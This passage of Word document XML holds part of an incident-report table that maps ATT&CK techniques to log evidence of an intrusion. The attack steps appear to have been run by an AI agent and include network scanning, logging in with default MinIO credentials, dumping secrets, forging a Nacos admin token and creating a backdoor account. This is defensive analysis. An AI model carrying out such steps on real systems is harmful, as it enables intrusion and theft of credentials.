          <w:p w14:paraId="24AB54FA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1552</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5835FDCF">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="41ACDA41">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">credentials.json retrieved from the terraform-state MinIO bucket in plaintext. LLMAgentLogs_CL, 19:30:35.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="271EAA01">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2EDEFD06">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1046</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6586F6B7">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Network Service Discovery</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3425EC50">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Second interpreter (PID 4491) sweeps 10.4.0.0/24 and identifies MinIO, MySQL, and Nacos within six seconds. LinuxProcess_CL, 19:27:28; LinuxNetwork_CL, 19:27:31–19:27:36.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="397B0029">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access / Lateral Movement</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6E1E0287">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078.001</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="221D101B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Valid Accounts: Default Accounts</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="31C60855">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MinIO accessed using unrotated factory default credentials, minioadmin:minioadmin, no exploit required. LLMAgentLogs_CL, 19:27:39, tool_result “auth ok minioadmin:minioadmin”.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1AC83DEC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="0E2735A6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1552.001</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5549366C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials: Credentials In Files</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="581BC282">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">The same credentials.json pull, viewed as a file-based credential exposure: a plaintext credential file sitting in an accessible bucket. LLMAgentLogs_CL, 19:30:35.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3E41B99B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Collection</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2D0FF5B0">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1005</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6A1F2687">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Data from Local System</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3B835B5C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_dump of Langflow's local Postgres backend, collecting 214 secrets directly from the host it was already running on. LLMAgentLogs_CL, 19:25:04; distinguished from the legitimate nightly pg_dump on ff-db-01 by account and target database.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2D3393A5">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="44CFCDD1">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1068</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="47FDCA62">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation for Privilege Escalation</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5F2691AE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Nacos's default JWT signing key, unrotated since 2020, forged to mint an admin-level token and create a backdoor account. Syslog, 19:34:36 (rejected) and 19:35:07 (corrected attempt succeeds).</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="33ED319E">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3789EEDD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1136.001</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1EE09C1C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Create Account: Local Account</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="14DCE24A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor account svc_maint created on ff-nacos-01 via the forged token. LinuxAudit_CL, type ADD_USER, pid=8801, uid=997, msg='op=adduser id=svc_maint', 19:35:07.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="148C979C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1CFC0E4B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1611</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4B4FF19A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Escape to Host</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="073E5928">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker socket queried for a possible container escape. Request captured (GET /containers/json, src=langflow-rce); the runtime never logs the response, so which containers it could see is not established. LinuxContainer_CL, 19:35:32.754.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
